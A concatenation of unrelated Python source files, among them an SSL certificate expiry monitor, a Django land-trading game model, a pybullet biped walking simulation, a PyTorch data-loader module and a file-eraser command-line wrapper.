parser.add_argument(
"-w",
"--warning",
default=30,
type=int,
help="warning threshold in days. default 30",
)
parser.add_argument(
"-c",
"--critical",
default=10,
type=int,
help="critical threshold in days. default 10",
)
parser.add_argument(
"-t", "--timeout", default=30, type=int, help="check timeout in seconds. default 30"
)
# parse arguments into array
args = parser.parse_args()
# assign our arguments to variables
host = args.host
port = args.port
warning = args.warning
critical = args.critical
timeout = args.timeout
if not critical <= warning:
print(
"The warning threshold must be greater than or equal to the critical threshold"
)
exit(3)
# set up ssl connection to host/port
try:
conn = ssl.create_connection((host, port))
except:
print(status[2] + "error connecting to host/port")
exit(2)
# give ssl connection the protocol version
try:
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
except:
print(status[2] + "error connecting with SSLv23")
exit(2)
# use SNI to get the correct cert for the hostname
try:
sock = context.wrap_socket(conn, server_hostname=host)
except:
print(status[2] + "error using SNI to find correct cert")
exit(2)
# save our cert info to a parse-able var
try:
cert = ssl.DER_cert_to_PEM_cert(sock.getpeercert(True))
# print(cert)
x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert)
# print(x509)
except:
print(status[2] + "unable to obtain cert")
exit(2)
# parse for expiration date
try:
expdate = x509.get_notAfter().decode("utf-8")
except:
print(status[3] + "unable to parse for notAfter date")
exit(3)
# we need that hostname too
try:
sslhost = x509.get_subject().CN
except:
print(status[3] + "unable to parse for x509 subject")
exit(3)
# print(expdate)
# print(type(expdate))
expdate = datetime.strptime(expdate, "%Y%m%d%H%M%SZ")
# print(expdate)
# print(type(expdate))
today = datetime.now()
# print(today)
# print(type(today))
delta = (expdate - today).days
# lets do some evaluation bro
if delta < 0:
print(status[3] + str(sslhost) + " expired or Buck did bad math - " + str(delta) + " days")
exit(3)
elif delta <= critical:
print(status[2] + str(sslhost) + " is going to expire in " + str(delta) + " days")
exit(2)
elif delta <= warning:
print(status[1] + str(sslhost) + " is going to expire in " + str(delta) + " days")
exit(1)
elif delta > warning:
print(status[0] + str(sslhost) + " is valid for " + str(delta) + " more days")
exit(0)
else:
print(status[3] + str(sslhost) + " to determine cert validity from value:" + str(delta))
exit(3)
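# Usage sketch (the script name and host below are placeholders):
#   python check_ssl_cert.py -H example.com
#   python check_ssl_cert.py -H example.com -P 8443 -w 45 -c 14
# Exit codes follow the Nagios-style statuses defined at the top of the script:
#   0 = OK, 1 = WARNING, 2 = CRITICAL, 3 = UNKNOWN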
|
py | 7df7d14299998ab4c5850342311717ad29b6c026 | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
from os import path
from setuptools import setup, find_packages
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(name='pyDigitalWaveTools',
version='1.1',
description='Library for operations with VCD and other digital wave files',
long_description=long_description,
long_description_content_type="text/markdown",
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)",
"Topic :: System :: Hardware",
"Topic :: System :: Emulators",
"Topic :: Utilities",
],
url='https://github.com/Nic30/pyDigitalWaveTools',
author='Michal Orsak',
author_email='[email protected]',
license='MIT',
packages=find_packages(exclude=["tests", ]),
zip_safe=True
)
|
py | 7df7d2a05421d2d2ff9ff6f53c7f43f15d4cee91 | from __future__ import annotations
from app.models.core import Company
from app.models.constants import Place
from django.db import models
from app.core.util.base import generate_unique_id
from app.models.constants import Land
from django.utils import timezone
from typing import Union
import logging
from setting import local_settings as env
import random
from datetime import datetime, timedelta
from app.models.core.exception import UnableToOwnLandscape
from app.core.db import ModelMixin
logger = logging.getLogger(__name__)
class LandscapeManager(models.Manager):
"""
The landscape manager.
"""
def get_single_landscape_by_company(self, landscape_id: Union[str, int], company: Company,
force_primary: bool = False) -> Landscape:
"""
This method return the landscape instance with given id and company.
The given company must own this landscape
if force_primary is True then it will look up for index key of the landscape in the database
default is False. You will need to make sure that param landscape_id is the actual index key
of the landscape not the land_id
:param company: the company instance or the company name. Both are fine but required
"""
if force_primary:
if type(company) == Company:
return self.get(id=landscape_id, company=company)
if isinstance(company, str):
                return self.get(id=landscape_id, company_name=company)
raise TypeError("The company must be a string or a company instance but got: %s" % type(company))
else:
if type(company) == Company:
return self.get(land_id=landscape_id, company=company)
if isinstance(company, str):
                return self.get(land_id=landscape_id, company_name=company)
raise TypeError("The company must be a string or a company instance but got: %s" % type(company))
def get_landscape_by_company(self, company: Union[Company, str], force_json: bool = False, values_list=None):
"""Return the list of landscape instance that are owned by the given company
Set force_json to True to return list of objects
"""
protected_values = self.model.protected
if type(company) == Company:
if force_json:
return list(self.filter(company=company).values(*protected_values))
return self.filter(company=company)
if isinstance(company, str):
if force_json:
                return list(self.filter(company_name=company).values(*protected_values))
return self.filter(company_name=company)
raise TypeError("lookup_company must be a Company instance or a string of company name")
def get_landscape_as_dict(self, land_id: str, protected_values: list = None):
"""
Return the landscape instance as dict.
If protected_values is provided, it will return only the fields specified otherwise
it will use the default settings from landscape model
"""
protected_values = tuple(protected_values) if protected_values else Landscape.protected
return Landscape.objects.values(*protected_values).get(land_id=land_id)
    def get_rent_landscape_by_company(self, company: Union[Company, str]):
        """Return the list of landscape instances that are on rent by the given company
The param company can be either a string representing company name or a company instance
"""
if type(company) == Company:
return self.filter(company=company, is_rent=True)
if isinstance(company, str):
return self.filter(company_name=company, is_rent=True)
raise TypeError("lookup_company must be a Company instance or a string of company name")
def get_supported_continents(self) -> dict:
"""Return the list of supported continents from Land class"""
return Land.objects.get_supported_continents()
def get_landscape_by_id(self, landscape_id: Union[int, str],
force_primary=False) -> Landscape:
"""Return the landscape instance by id.
If force_primary is True, it will search for primary_key. Default is
False
Exception: Model not found exception will raise if there is no result
found.
"""
if force_primary:
return self.get(id=landscape_id)
return self.get(land_id=landscape_id)
def landscape_is_available(self, landscape_id: Union[str, int],
force_primary: bool = False) -> bool:
"""Return true if landscape is available to purchase (buy/rent)
If you wish to look up by primary_key, simple add force_primary=True,
default is False
"""
if force_primary:
if isinstance(landscape_id, str) or isinstance(landscape_id, int):
try:
landscape: Landscape = self.get(id=landscape_id)
return landscape.can_be_purchased()
except Exception as e:
logger.info(e)
raise TypeError("The landscape id cannot be found")
raise TypeError("The landscape id must be a string")
else:
if isinstance(landscape_id, str) or isinstance(landscape_id, int):
try:
landscape: Landscape = self.get(land_id=landscape_id)
return landscape.can_be_purchased()
except Exception as e:
logger.info(e)
raise TypeError("The landscape id cannot be found")
raise TypeError("The landscape id must be a string")
def _generate_default_landscape(self, continent: str):
"""Return the landscape instance but DOES NOT SAVE INTO DATABASE
consider using create_land() instead
"""
level: int = Land.objects.get_random_land_level()
land: Land = Land.objects.get_land_by_level(level)
return Landscape(level=level, buy_cost=land.get_land_cost(), rent_cost=land.get_rent_cost(),
continent_cost=land.get_continent_buy_cost(),
continent_rent=land.get_continent_rent_cost(),
continent=continent.lower(),
place=Place.objects.get_random_place(continent))
def create_land(self, continent: str = Land.objects.default_continent()) -> Landscape:
"""Create default land. To retreive supported continents
You may use Land.objects.get_supported_continents() method
:param continent: supported continent (str)
return Landscape instance
"""
if continent.lower() in Land.objects.get_supported_continents():
landscape: Landscape = self._generate_default_landscape(continent)
landscape.save(force_insert=True)
return landscape
else:
raise Exception("Invalid continent name. Please see Land.objects.get_supported_continents()")
def create_multiple_landscape(self, continent: str, number_of_land: int) -> None:
"""
        Generate multiple landscapes.
        This method falls back to the create_land method.
        :param continent: the continent you wish to create landscapes for
        :param number_of_land: the number of landscapes to create
return None
"""
lands = [self._generate_default_landscape(continent) for i in range(int(number_of_land))]
self.bulk_create(lands)
def get_available_land(self):
"""Return list of Landscape objects that are not owned by any company"""
return self.filter(company_name=None)
def get_random_available_land(self, json_format=True):
"""get random land available to be purchased"""
if json_format:
landscapes_available = self.get_available_land()
random_lands = random.sample(list(landscapes_available.values()), env.MAXIMUM_lAND_VIEW)
return random_lands
else:
raise Exception("Not available in normal format.")
class Landscape(models.Model, ModelMixin):
"""The base landscape models for create or upgrading anything related to land
To only retrive default and base land details, consider using Land object instead.
Alternatively, Landscape also supports retrieving information from Land object
"""
land_id = models.CharField(max_length=255, default=generate_unique_id)
level = models.IntegerField()
company_name = models.CharField(max_length=255, null=True)
company = models.ForeignKey(Company, on_delete=models.CASCADE, null=True)
continent = models.CharField(max_length=255)
place = models.CharField(max_length=255)
buy_cost = models.DecimalField(max_digits=20, decimal_places=4)
rent_cost = models.DecimalField(max_digits=20, decimal_places=4)
# the cost of contient specific will be the extra cost.
# buy cost + continent_cost
continent_cost = models.DecimalField(max_digits=20, decimal_places=4)
continent_rent = models.DecimalField(max_digits=20, decimal_places=4)
is_buy = models.BooleanField(default=False)
is_rent = models.BooleanField(default=False)
is_selling = models.BooleanField(default=True)
created_at = models.DateTimeField(editable=False, default=timezone.now)
updated_at = models.DateTimeField(null=True)
# will be used to detect rent time
last_collected_money_at = models.DateTimeField(null=True)
objects = LandscapeManager()
unprotected = ['land_id', 'company_name', 'level', 'continent', 'place', 'buy_cost', 'rent_cost',
'continent_cost', 'continent_rent', 'is_buy', 'is_rent', 'is_selling']
protected = ['created_at', 'updated_at']
def buy(self, *args, **kwargs):
"""Buy the landscape. This function simple will try to
update properties respectively.
NOTE: This does not subtract the required cost to obtain the landscape
but rather updating properties and save them to the database
Alternatively, you can update it like the way how you normally
do with django
This should not be called directly. Consider calling purchase_landscape for buying
"""
if self.id:
self.is_buy = True
self.is_rent = False
self.is_selling = False
self.last_collected_money_at = timezone.now()
return self.save(*args, **kwargs)
else:
raise Exception("Unable to buy landscape")
def rent(self, *args, **kwargs):
"""Rent a landscape. This function simple will try to update
properties respectively.
NOTE: This does not subtract the required cost to obtain the landscape
but rather updating properties and save them to the database
Alternatively, you can update it like the way how you normally
do with django
This should not be called directly. Consider calling rent_landscape for renting
"""
if self.id:
self.is_buy = False
self.is_rent = True
self.is_selling = False
self.last_collected_money_at = timezone.now()
return self.save(*args, **kwargs)
else:
raise Exception("Unable to rent landscape")
def on_rent(self) -> bool:
"""Return true if this landscape is on rent by a company"""
return self.is_rent
def already_bought(self) -> bool:
"""Return true if this landscape is already bought from a company"""
return self.is_buy
def can_be_purchased(self) -> bool:
"""Return true if this landscape can be purchased"""
return self.is_selling
def company_able_to_purchase(self, company: Company, method_acquired: str) -> bool:
"""Return true if this given company instance be able to buy the land
This function will check for balance left in company
"""
supported_methods_acquired = ['buy', 'rent', 'buy_cost', 'rent_cost']
if method_acquired.lower() in supported_methods_acquired and isinstance(method_acquired, str):
if not method_acquired.lower().endswith('_cost'):
method_acquired = method_acquired.lower() + '_cost'
if type(company) == Company:
return company.balance >= getattr(self, method_acquired)
raise TypeError("method_acquired param must be in supported methods but got %s instead" % method_acquired)
def save(self, *args, **kwargs) -> None:
"""Save the object to the database"""
if not self.id:
self.created_at = timezone.now()
self.updated_at = timezone.now()
return super().save(*args, **kwargs)
def purchase_landscape(self, company: Company) -> None:
"""The function will withdraw a certain amount of money from given company
:param company: The company instance that wish to own this landscape
DEPRECATED: consider using buy_landscape for better naming
This function does not call company_able_to_purchase_method, you must call it manually and before this function
or else an exception will be thrown or alternative way is you must call Company.can_own_landscape()
"""
if isinstance(company, Company):
self.company = company
self.company_name = company.company_name
if self.required_extra_continent_cost(company):
extra_cost = self.get_extra_contient_cost(company, 'buy')
company_new_balance = company.balance - (self.buy_cost + extra_cost)
else:
company_new_balance = company.balance - self.buy_cost
if company_new_balance < 0:
raise UnableToOwnLandscape("Company balance does not meet the requirements")
company.balance = company_new_balance
company.save()
self.buy()
else:
raise TypeError("The company param must be an instance of Company but got {} instead".format(type(company)))
def buy_landscape(self, company: Company) -> None:
"""The function will withdraw a certain amount of money from given company
:param company: The company instance that wish to own this landscape
This function does not call company_able_to_purchase_method, you must call it manually and before this function
or else an exception will be thrown or alternative way is you must call Company.can_own_landscape()
"""
if isinstance(company, Company):
self.company = company
self.company_name = company.company_name
if self.required_extra_continent_cost(company):
extra_cost = self.get_extra_contient_cost(company, 'buy')
company_new_balance = company.balance - (self.buy_cost + extra_cost)
else:
company_new_balance = company.balance - self.buy_cost
if company_new_balance < 0:
raise UnableToOwnLandscape("Company balance does not meet the requirements")
company.balance = company_new_balance
company.save()
self.buy()
else:
raise TypeError("The company param must be an instance of Company but got {} instead".format(type(company)))
def rent_landscape(self, company: Company) -> None:
"""The function will withdraw a certain amount of money from given company
:param company: The company instance that wish to own this landscape
This function does not call company_able_to_purchase_method, you must call it manually and before this function
or else an exception will be thrown or alternative way is you must call Company.can_own_landscape()
"""
if isinstance(company, Company):
self.company = company
self.company_name = company.company_name
if self.required_extra_continent_cost(company):
extra_cost = self.get_extra_contient_cost(company, 'rent')
                company_new_balance = company.balance - (self.rent_cost + extra_cost)
else:
company_new_balance = company.balance - self.rent_cost
if company_new_balance < 0:
raise UnableToOwnLandscape("Company balance does not meet the requirements")
company.balance = company_new_balance
company.save()
self.rent()
else:
raise TypeError("The company param must be an instance of Company but got {} instead".format(type(company)))
def required_extra_continent_cost(self, company: Company) -> bool:
"""
        Return True if there is an extra cost for owning a land
        outside the company's registered continent
        Return False if there is no extra cost or an invalid company object was passed
"""
if type(company) == Company:
return company.continent != self.continent
return False
def get_extra_contient_cost(self, company: Company, method_acquired: str) -> Union[models.DecimalField, int]:
"""This method return the extra cost for owning the land that outside of
company registered continent.
:param company: the company instance that wants to buy the land
:param method_acquired: the method of owning the land that the company wish to own
must be present in string format (case insensitive but underscore must present).
Supported format: (continent_cost, continent_rent)
        return extra cost in number format. If the company does not require an extra continent cost
this method will return 0
"""
# preventing access to other attributes
supported_methods_acquired = ['continent_cost', 'continent_rent']
if method_acquired.lower() == 'buy':
method_acquired = 'continent_cost'
if not method_acquired.lower().startswith('continent_'):
method_acquired = 'continent_' + method_acquired.lower()
if self.required_extra_continent_cost(company) and method_acquired.lower() in supported_methods_acquired:
return getattr(self, method_acquired.lower())
return 0
def put_on_sale(self, company: Company, price: float) -> None:
"""
Put this landscape on sale. Currently only support buy method
This also means that the given company must own this landscape
"""
if type(company) == Company and isinstance(price, float):
if self.company_name == company.company_name and self.already_bought():
# only is the given company owns this landscape
self.is_selling = True
self.buy_cost = price
self.save()
def owned_by(self, company: Union[Company, str]) -> bool:
"""Return True if this landscape is owned by given company"""
if isinstance(company, str):
return self.company_name == company
elif type(company) == Company:
return self.company == company
raise TypeError("Company must be a string or a Company instance")
def needs_to_pay_rent(self):
"""Return true if the company needs to pay rent"""
if self.is_rent:
now: datetime = timezone.now()
return now - timedelta(days=7) >= self.last_collected_money_at
return False
def pay_rent(self, company: Company) -> None:
"""Pay the required rent. This method calls needs_to_pay_rent method directly
to check if the landscape needs to be paid. This is to ensure that user do not pay
too soon or too late.
"""
if self.needs_to_pay_rent():
# Only the same owner can pay the rent
if self.company == company:
company.balance -= self.rent_cost
if company.balance < 0:
raise ValueError("Insufficient amount of money to pay")
company.save()
self.last_collected_money_at = timezone.now()
def rent_overdue(self):
"""
Return true if the rent is overdue. This will be usually one month (30) days
"""
if self.is_rent:
now: datetime = timezone.now()
return now - timedelta(days=30) >= self.last_collected_money_at
return False
def can_create_rent_building(self, level: int):
"""
Return true if can create a building that is on rent on this landscape
"""
# check if no building on this land
if not hasattr(self, 'building'):
return 0 <= level <= self.level
def can_create_building(self, level: int):
"""
Return true if can construct a building and buy.
Regardless of method of acquiring. This always return True.
The level must be 0 but will return true as we will assume the level is 0
"""
# check if no building on this land
if not hasattr(self, 'building'):
return level == 0
def next_pay_rent_date(self) -> str:
"""Return the date that rent must be paid
in yyyy-mm-dd format
Please note that if the landscape is bought (not on rent) then it will return
the string "No payment required"
"""
if self.is_rent:
next_due = self.last_collected_money_at + timedelta(days=7)
return datetime.strftime(next_due, "%Y-%m-%d")
return "No payment required"
|
py | 7df7d2b86e0abff4de8f08b5e0979a3a00fe4c8e | import os
import re
import pyblish.api
from pype.houdini import lib
class CollectFrames(pyblish.api.InstancePlugin):
"""Collect all frames which would be a resukl"""
order = pyblish.api.CollectorOrder
label = "Collect Frames"
families = ["vdbcache"]
def process(self, instance):
ropnode = instance[0]
output_parm = lib.get_output_parameter(ropnode)
output = output_parm.eval()
file_name = os.path.basename(output)
match = re.match("(\w+)\.(\d+)\.vdb", file_name)
result = file_name
start_frame = instance.data.get("frameStart", None)
end_frame = instance.data.get("frameEnd", None)
if match and start_frame is not None:
# Check if frames are bigger than 1 (file collection)
# override the result
if end_frame - start_frame > 1:
result = self.create_file_list(match,
int(start_frame),
int(end_frame))
instance.data.update({"frames": result})
def create_file_list(self, match, start_frame, end_frame):
"""Collect files based on frame range and regex.match
Args:
match(re.match): match object
start_frame(int): start of the animation
end_frame(int): end of the animation
Returns:
list
"""
result = []
padding = len(match.group(2))
name = match.group(1)
padding_format = "{number:0{width}d}"
count = start_frame
while count <= end_frame:
str_count = padding_format.format(number=count, width=padding)
file_name = "{}.{}.vdb".format(name, str_count)
result.append(file_name)
count += 1
return result
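# Usage sketch: for a hypothetical cache written as "smoke.1001.vdb" with a
# frame range of 1001-1003, the collector above would produce:
#   match = re.match(r"(\w+)\.(\d+)\.vdb", "smoke.1001.vdb")
#   create_file_list(match, 1001, 1003)
#   -> ["smoke.1001.vdb", "smoke.1002.vdb", "smoke.1003.vdb"]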
|
py | 7df7d356da1641f7a415acb77141aca46a0e1334 | """
# data_getter
The data getter manages the initialization of different torch DataLoaders.
A dataloader is essentially an Iterable that can be called in a for-loop.
A typical training step could for example look like this:
data_loaders = data_getter.get_data_loaders(...)
for sample in data_loader['train']:
image, label = sample[0], sample[1]
prediction = model(image)
loss = loss_function(prediction, label)
...
A dataloader contains an object of class Dataset that handles the loading and augmentation process. 'ds_natural_images' gives an example for a custom
dataset.
'get_data_loaders' expects a string 'dataset' that identifies which dataset is to be used (e.g., mnist, cifar-10, ...). 'batch_size' denotes how many
samples (here mainly images) are combined to a mini-batch. A typical PyTorch
minibatch tensor of images has the dimension:
(batch_size, 3, height of image, width of image)
3 is the dimension of the three image channels red, green, and blue.
In 'run_training.py', batch_size is defined by the argument 'bs'.
'num_workers' defines how many processes load data in parallel. Using more than
one worker can, in specific cases, speed up the dataset loading process and,
thus, the entire training. If you want to debug your code, num_workers needs
to be set to 0.
In 'run_training.py', num_workers is defined by the argument 'nw'.
You can use kwargs (in 'run_training.py' the system argument 'ds_kwargs') to
pass configuration values that are very specific to a dataset.
kwargs is a dictionary of keyword-value pairs. EACH VALUE IS A LIST, even if it
only contains a single element. Furthermore, you need to take care of each
value's type. For example,
split_index = int(kwargs['split_index'][0])
contains a list with a string. To get the actual number, you'll need to typecast
it to an int.
For more information, see DLBio's 'kwargs_translator'.
To add a new dataset, you'll need to create a new file 'ds_[dataset_name].py'
in the 'data' folder. You'll need to create a class that inherits Dataset and
implements '__getitem__' and '__len__'. Furthermore, you'll need to define the
function 'get_dataloader'. Finally, you'll need to append an elif case to this
module's function 'get_data_loaders' that calls 'get_dataloader' and returns
a dictionary containing the keys 'train', 'val', and 'test'. If there is no
'val' or 'test' dataloader available, set these values to None.
'ds_natural_images.py' is an example of how to write a custom dataset.
"""
from . import ds_natural_images
from . import ds_cifar10
from . import ds_mnist
def get_data_loaders(dataset: str, batch_size: int, num_workers: int, **kwargs) -> dict:
if dataset == 'nat_im':
split_index = int(kwargs['split_index'][0])
return {'train': ds_natural_images.get_dataloader(
True, batch_size, split_index, num_workers=num_workers),
'val': ds_natural_images.get_dataloader(
False, batch_size, split_index, num_workers=num_workers),
'test': None
}
elif dataset == 'cifar_10':
return {
'train': ds_cifar10.get_data_loader(
is_train=True, batch_size=batch_size,
num_workers=num_workers
),
'val': ds_cifar10.get_data_loader(
is_train=False, batch_size=batch_size,
num_workers=num_workers
),
'test': None
}
elif dataset == 'mnist':
        return {
'train': ds_mnist.get_dataloader(
True, batch_size=batch_size, num_workers=num_workers),
'val': ds_mnist.get_dataloader(
False, batch_size=batch_size, num_workers=num_workers),
'test': None
}
else:
        raise ValueError(f'Unknown dataset: {dataset}')
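def _example_usage():
    """Usage sketch mirroring the module docstring above: kwargs values are
    lists of strings (see DLBio's kwargs_translator); the split_index value
    here is made up."""
    loaders = get_data_loaders('cifar_10', batch_size=32, num_workers=0)
    for images, labels in loaders['train']:
        print(images.shape, labels.shape)
        break
    # dataset-specific kwargs, e.g. for 'nat_im':
    # loaders = get_data_loaders('nat_im', 32, 0, split_index=['0'])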
|
py | 7df7d4f2d67548e8c1b06a5d6b14dabbb82f6e92 | """
bipedal robot walking simulation
by Einsbon (Sunbin Kim)
- GitHub: https://github.com/Einsbon
- Youtube: https://www.youtube.com/channel/UCt7FZ-8uzV_jHJiKp3NlHvg
- Blog: https://blog.naver.com/einsbon
"""
import pybullet as p
import time
from time import sleep
import pybullet_data
import numpy as np
import math
import os
import motorController
import walkGenerator
# motor parameters
motor_kp = 0.5
motor_kd = 0.5
motor_torque = 20
motor_max_velocity = 5.0
# physics parameters
fixedTimeStep = 1. / 2000
numSolverIterations = 200
physicsClient = p.connect(p.GUI)
p.setTimeStep(fixedTimeStep)
p.setPhysicsEngineParameter(numSolverIterations=numSolverIterations)
p.setAdditionalSearchPath(pybullet_data.getDataPath()) # to load plane.urdf
p.setGravity(0, 0, 0)
p.resetDebugVisualizerCamera(cameraDistance=1, cameraYaw=10, cameraPitch=-0, cameraTargetPosition=[0.4, 0, 0.1])
planeID = p.loadURDF("plane.urdf")
robotID = p.loadURDF(os.path.abspath(os.path.dirname(__file__)) + '/humanoid_leg_12dof.8.urdf', [0, 0, 0.31],
p.getQuaternionFromEuler([0, 0, 0]),
useFixedBase=False)
motorsController = motorController.MotorController(robotID, physicsClient, fixedTimeStep, motor_kp, motor_kd, motor_torque, motor_max_velocity)
print(motorsController.getRevoluteJoint_nameToId())
# %%
motorController.MotorController()
walk = walkGenerator.WalkGenerator()
walk.setWalkParameter(bodyMovePoint=8,
legMovePoint=8,
height=50,
stride=90,
sit=50,
swayBody=30,
swayFoot=0,
bodyPositionForwardPlus=5,
swayShift=3,
liftPush=0.5,
landPull=0.7,
timeStep=0.06,
damping=0.0,
incline=0.0)
walk.generate()
walk.inverseKinematicsAll()
walk.showGaitPoint3D()
actionTime = walk._timeStep
p.setGravity(0, 0, -9.8)
p.setRealTimeSimulation(0)
motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesStartRight[0], 2, 0)
# rest 1 second in engine
waitTime = 1
repeatTime = int(waitTime / fixedTimeStep)
for _ in range(repeatTime):
p.stepSimulation()
# time.sleep(fixedTimeStep)
p.setGravity(0, 0, -9.8)
rightStep = True
walkPointNum = walk._bodyMovePoint + walk._legMovePoint
for i in range(walkPointNum):
motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesStartLeft[i], actionTime, 0)
for _ in range(4):
for i in range(np.size(walk.walkAnglesWalkingRight, 0)):
motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesWalkingRight[i], actionTime, 0)
for i in range(np.size(walk.walkAnglesWalkingLeft, 0)):
motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesWalkingLeft[i], actionTime, 0)
for i in range(walkPointNum):
motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesEndRight[i], actionTime, 0)
'''
Implemented in a more complex way.
if rightStep == True:
for i in range(walkPointNum):
motorsController.setMotorsAngleInFixedTimestep(
walk.inverseKinematicsPoint(walk.walkPointStartRightstepRightLeg[:, i], walk.walkPointStartRightstepLeftLeg[:, i]), actionTime, 0)
rightStep = False
else:
for i in range(walkPointNum):
motorsController.setMotorsAngleInFixedTimestep(
walk.inverseKinematicsPoint(walk.walkPointStartLeftstepRightLeg[:, i], walk.walkPointStartLeftstepLeftLeg[:, i]), actionTime, 0)
rightStep = True
for i in range(4):
if(rightStep):
# right foot step
for i in range(walkPointNum):
motorsController.setMotorsAngleInFixedTimestep(
walk.inverseKinematicsPoint(walk.walkPointRightStepRightLeg[:, i], walk.walkPointRightStepLeftLeg[:, i]), actionTime, 0)
rightStep = False
else:
# left foot step
for i in range(walkPointNum):
motorsController.setMotorsAngleInFixedTimestep(
walk.inverseKinematicsPoint(walk.walkPointLeftStepRightLeg[:, i], walk.walkPointLeftStepLeftLeg[:, i]), actionTime, 0)
rightStep = True
if rightStep == True:
# end walking. left
for i in range(walkPointNum):
motorsController.setMotorsAngleInFixedTimestep(
walk.inverseKinematicsPoint(walk.walkPointEndRightstepRightLeg[:, i], walk.walkPointEndRightstepLeftLeg[:, i]), actionTime, 0)
rightStep = False
else:
# end walking. left
for i in range(walkPointNum):
motorsController.setMotorsAngleInFixedTimestep(
walk.inverseKinematicsPoint(walk.walkPointEndLeftstepRightLeg[:, i], walk.walkPointEndLeftstepLeftLeg[:, i]), actionTime, 0)
rightStep = True
'''
# rest 2 seconds in engine
waitTime = 1
repeatTime = int(waitTime / fixedTimeStep)
for _ in range(repeatTime):
p.stepSimulation()
# robot control using (x,y,z) point.
motorsController.setMotorsAngleInFixedTimestep(walk.inverseKinematicsPoint([0, 0, 0], [0, 0, 0]), 0.5, 0.5)
motorsController.setMotorsAngleInFixedTimestep(walk.inverseKinematicsPoint([0, 0, 40], [0, 0, 40]), 0.5, 0.5)
motorsController.setMotorsAngleInFixedTimestep(walk.inverseKinematicsPoint([0, 0, 0], [0, 0, 0]), 0.5, 0.5)
motorsController.setMotorsAngleInFixedTimestep(walk.inverseKinematicsPoint([0, 0, 40], [0, 0, 40]), 0.5, 0.5)
motorsController.setMotorsAngleInFixedTimestep(walk.inverseKinematicsPoint([0, 30, 40], [0, 30, 40]), 0.5, 0.5)
motorsController.setMotorsAngleInFixedTimestep(walk.inverseKinematicsPoint([0, 0, 40], [0, 0, 40]), 0.5, 0.5)
# # More applied version. Press Enter to start or stop walking.
# walking = False
# rightStep = True
# while (1):
# keys = p.getKeyboardEvents()
# for k, v in keys.items():
# if (k == 65309) and (v == 3 or v == 6): # if enter key is pressed
# walking = True
# keys = {}
# if walking == True:
# if rightStep == True:
# for i in range(walkPointNum):
# motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesStartRight[i], actionTime, 0)
# rightStep = False
# else:
# for i in range(walkPointNum):
# motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesStartLeft[i], actionTime, 0)
# rightStep = True
# keys = p.getKeyboardEvents()
# for k, v in keys.items():
# if (k == 65309) and (v == 3 or v == 6): # if enter key is pressed
# walking = False
# keys = {}
# while (walking):
# if (rightStep):
# for i in range(walkPointNum):
# motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesWalkingRight[i], actionTime, 0)
# rightStep = False
# else:
# for i in range(walkPointNum):
# motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesWalkingLeft[i], actionTime, 0)
# rightStep = True
# keys = p.getKeyboardEvents()
# for k, v in keys.items():
# if (k == 65309) and (v == 3 or v == 6): # if enter key is pressed
# walking = False
# keys = {}
# if rightStep == True:
# for i in range(walkPointNum):
# motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesEndRight[i], actionTime, 0)
# rightStep = False
# else:
# for i in range(walkPointNum):
# motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesEndLeft[i], actionTime, 0)
# rightStep = True
# else:
# p.stepSimulation()
# %%
|
py | 7df7d5735eb450147b9727bb69c915b145b4df52 | import argparse
import logging
import logging.config
from eraser.eraser import Eraser
LOGGER = logging.getLogger(__name__)
def parse_arguments():
    parser = argparse.ArgumentParser(description='Erase target files and directories')
subparsers = parser.add_subparsers(help='sub-command help')
# Group: logging
log_group = parser.add_argument_group('logging')
log_group.add_argument('--loglevel', default='error', help='Logging ERROR by default',
choices=['debug', 'info', 'warning', 'error', 'critical'])
log_group.add_argument('--logformat', default='%(asctime)s - %(levelname)s - %(message)s')
# Group: retry
retry_group = parser.add_argument_group('retry')
retry_group.add_argument('--sleep', type=int, default=5,
help='Time to sleep the thread, 5 by default')
retry_group.add_argument('--max-retry', type=int, default=100,
help='How many times will attempt to erase the files, 100 by default')
# Subparser: targets
parser_targets = subparsers.add_parser('targets', help='targets help')
parser_targets.add_argument(
'targets', metavar='targets', type=str, nargs='+',
        help='List of target files and directories to be erased')
# Subparser: from_file
parser_from_file = subparsers.add_parser('from_file', help='targets from file help')
parser_from_file.add_argument('path', nargs=1, help='Path to the input file with the targets')
parser_from_file.add_argument('format', choices=['plain', 'json', 'xml'],
help='File format of the input file: plain, json, xml')
return parser.parse_args()
def config_logger(args):
numeric_level = getattr(logging, args.loglevel.upper(), None)
if not isinstance(numeric_level, int):
raise ValueError('Invalid log level: {}'.format(args.loglevel))
log_format = args.logformat
if log_format is None or len(log_format) == 0:
raise ValueError('Invalid log format: "{}"'.format(log_format))
logging.basicConfig(level=numeric_level, format=log_format)
def main():
args = parse_arguments()
config_logger(args)
LOGGER.debug(args)
    if getattr(args, 'targets', None):
eraser = Eraser()
eraser.targets(args.targets)
eraser.erase()
if __name__ == '__main__':
main()
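# Usage sketch (module/script name and paths are placeholders; global options
# such as --loglevel go before the sub-command):
#   python erase_cli.py --loglevel debug targets /tmp/old.log /tmp/cache_dir
#   python erase_cli.py --sleep 10 --max-retry 50 from_file targets.txt plain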
|
py | 7df7d767c39f455bc816f43725966ba92f7b78f9 |
from logging import getLogger
from pathlib import Path
import sqlite3
LOGGER = getLogger(__name__)
def iter2list(func):
def wrapper(*args, **kwargs):
return list(func(*args, **kwargs))
return wrapper
def from_path(path):
if isinstance(path, Path):
return str(path.absolute())
return path
class Db(object):
def __init__(self, multithread=False):
self.db = None
self.db_path = None
self.multithread = multithread
def open(self, path):
self.db_path = path
self.db = sqlite3.connect(path, check_same_thread=not self.multithread)
def close(self):
self.db_path = None
self.db.close()
